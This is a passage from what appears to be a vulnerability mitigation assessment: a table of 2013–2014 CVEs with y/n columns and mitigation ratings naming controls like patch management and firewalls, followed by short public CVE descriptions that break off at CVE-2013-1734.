CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration - no JS
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y |  | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
CVE Details

CVE-2013-0008
win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".

CVE-2013-0022
Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".

CVE-2013-0084
Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".

CVE-2013-0140
SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149
The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172
Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174
The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199
The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253
The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270
OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481
The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598
Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619
Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633
Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649
Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753
Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787
Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909
The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035
The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102
The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140
The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144
Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153
Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181
Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303
Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384
Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388
Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450
Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553
Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620
The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627
Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638
Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676
The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700
The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734
